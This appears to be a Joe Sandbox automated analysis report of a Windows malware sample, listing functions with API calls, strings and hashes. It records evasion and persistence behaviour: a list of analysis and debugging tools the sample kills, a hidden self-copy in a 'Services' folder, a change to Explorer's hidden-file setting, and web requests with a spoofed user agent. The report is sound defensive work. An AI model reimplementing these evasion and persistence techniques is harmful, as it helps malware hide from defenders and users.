                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7F2D01C5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 4279794846-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction ID: bb707d346d752050028a6ff23aa18d7d2d5b7911c5611197f6a2b26c41addab2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E971D832618A8182E750EB55F45472AF7A0FBC4794F905035FA9A47AACCFBCD844CB61
                                                                                                                                                                                                                                                    Function 00007FF7F2D04808 Relevance: 25.7, APIs: 17, Instructions: 166memoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4026551389-0
                                                                                                                                                                                                                                                    • Opcode ID: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction ID: c8f9efaf56e88c220983eb068caf674451113610158ba0a74503ad8888e4272f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7810936608B8582EB50DB56F45472EA7A0FBC9B91F504135EE9D83BA8DFBCD044CB60
                                                                                                                                                                                                                                                    Function 00007FF7F2D02FE0 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D044C8: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D0301B), ref: 00007FF7F2D04510
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D044C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D0301B), ref: 00007FF7F2D0454D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D044C8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D0301B), ref: 00007FF7F2D04558
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03A88: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D03020), ref: 00007FF7F2D03ACB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03A88: RegSetValueExW.ADVAPI32 ref: 00007FF7F2D03B01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03B28: RegDeleteKeyW.ADVAPI32 ref: 00007FF7F2D03B40
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7F2D03D3B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: Process32FirstW.KERNEL32 ref: 00007FF7F2D03D6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: CloseHandle.KERNEL32 ref: 00007FF7F2D03D80
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: wcscmp.MSVCRT ref: 00007FF7F2D03D95
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: OpenProcess.KERNEL32 ref: 00007FF7F2D03DAB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: TerminateProcess.KERNEL32 ref: 00007FF7F2D03DCE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: CloseHandle.KERNEL32 ref: 00007FF7F2D03DDC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: Process32NextW.KERNEL32 ref: 00007FF7F2D03DEF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03D28: CloseHandle.KERNEL32 ref: 00007FF7F2D03E01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D038B8: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7F2D03A10), ref: 00007FF7F2D038E8
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00007FF7F2D030CA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                                    • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                                    • API String ID: 3861102711-928700279
                                                                                                                                                                                                                                                    • Opcode ID: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction ID: 5a663e87d40532613c396d2c4c8fb7a21c980eebf0b0ca68302c01a222fdffce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA215D20A1C906A5FB80FB20E8511F9E220AF60754FD04531E53E862FE9EACE546D3F1
                                                                                                                                                                                                                                                    Function 00007FF7F2D037C8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7F2D03688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03648: GetVolumeInformationW.KERNEL32 ref: 00007FF7F2D03705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03648: wsprintfW.USER32 ref: 00007FF7F2D037A6
                                                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03811
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03826
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03839
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03849
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D0385C
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03871
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03884
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03899
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: .exe
                                                                                                                                                                                                                                                    • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                                    • Opcode ID: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction ID: f8e0c15a05ff362ce0338bbd3fd6776e53d5fca65fbb9198f292da6964ef1f56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911212162998695DB60EB25F854B6EA331FFC4B80F909031DA5E43ABDDE7CD448C7A0
                                                                                                                                                                                                                                                    Function 00007FF7F2D02E30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                                    • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 299056699-189039185
                                                                                                                                                                                                                                                    • Opcode ID: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction ID: a4e456d77b970e5f46acd4c7f13272760083ed13e90be20c8204d97fd71dcc38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4901E922A4CA0181F734EB11E84826DA760FBC8B94F840131D9AE466BCCEBCE585C6B1
                                                                                                                                                                                                                                                    Function 00007FF7F2D03D28 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                                                    • Opcode ID: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction ID: 682773dcca5ebb8dc3d42cc6d3e9b2443bbe21ce5c0b0d992e50df62b66f952a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321B931A0CA8681F7B0EB11E84836AA360FB84754F904234D6AD465FCDFBDE445DBB1
                                                                                                                                                                                                                                                    Function 00007FF7F2D03BE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction ID: 3762b45b8d9b8fc83e204e4c3af10fcda1ee264354fd7b7f7fb0150f2602e45c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D31EC7661CAC085D7B0DB19E4887AAB3A0F788B40F400235DA9DC7BA8DF7CD554CB64
                                                                                                                                                                                                                                                    Function 00007FF7F2D03F08 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2850635065-0
                                                                                                                                                                                                                                                    • Opcode ID: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction ID: 7e151b732ebf09b1feccb07326fdcc2617405dc3c86f9f6366ededc3ed65233e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB11EC31A0CA8686E7B0EB10E48836AA7A0FB84754F904235D6AD466ECDFBCD504CB60
                                                                                                                                                                                                                                                    Function 00007FF7F2D03648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                                    • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                                    • Opcode ID: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction ID: 1f498a2690f46b14f1eeb13927a420a40bba8dbdf2e32f54b91c50f6f56ec641
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431192661C6C1C6D770EB60E4883AAB3A0FB84700F800136E69D83AACDBBDD509CB50
                                                                                                                                                                                                                                                    Function 00007FF7F2D03978 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7F2D03688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03648: GetVolumeInformationW.KERNEL32 ref: 00007FF7F2D03705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03648: wsprintfW.USER32 ref: 00007FF7F2D037A6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03811
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03826
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03839
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03849
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D0385C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03871
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03884
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D037C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F2D039AD), ref: 00007FF7F2D03899
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32 ref: 00007FF7F2D039BD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32 ref: 00007FF7F2D039C8
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32 ref: 00007FF7F2D039F9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$AttributesDirectory$CreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: Services
                                                                                                                                                                                                                                                    • API String ID: 3354170184-2319745855
                                                                                                                                                                                                                                                    • Opcode ID: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction ID: d68d9015ea74fc5c4467c5c84e3af9692a294db32e2aa60992f49055ffb54363
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1019261B18586A2EB60EB24E4553AE93A0FF84744FD05432D75D835FCEE6CD20ECBA0
                                                                                                                                                                                                                                                    Function 00007FF7F2D03A88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: OpenValue
                                                                                                                                                                                                                                                    • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                                    • API String ID: 3130442925-85274793
